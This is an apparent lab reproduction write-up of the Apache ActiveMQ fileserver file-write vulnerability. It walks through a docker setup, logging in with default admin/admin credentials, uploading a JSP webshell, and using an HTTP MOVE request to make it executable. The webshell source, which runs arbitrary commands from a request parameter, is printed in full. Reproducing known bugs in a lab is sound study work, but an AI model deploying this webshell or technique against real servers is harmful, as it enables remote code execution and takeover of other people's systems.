1. Vulnerability Details

Affected version: Apache ActiveMQ 5.x~5.14.0

Vulnerability principle: The fileserver interface for storing files in ActiveMQ supports writing files, but has no execution permission. Files can be written and accessed by MOVE files to other executable directories.

In versions 5.12.x~5.13.x, ActiveMQ disables the fileserver application by default (but it can be enabled in conf/jetty.xml); after version 5.14.0, the fileserver application is completely deleted.

2. Recurrence process

Build a docker environment

docker-compose up -d

Access port 8161

Default account password admin/admin login

write webshell file

A successful file upload requires the following prerequisites:

Know the absolute path of the file upload

The website has a file upload function

File types are not restricted

Uploaded files can be executed

The absolute path of ActiveMQ can be obtained through http://your-ip:8161/admin/test/systemProperties.jsp page

I found a jsp Trojan horse on the Internet

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

Use bp to capture and upload, you can see that the upload is successful

Visit http://192.168.239.128:8161/fileserver/1.jsp, the file is written but not executed

MOVE the file to the executable directory

Use MOVE to move the Trojan file to api or admin. I moved it to the admin directory.

ActiveMQ's web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, and fileserver is the interface for storing files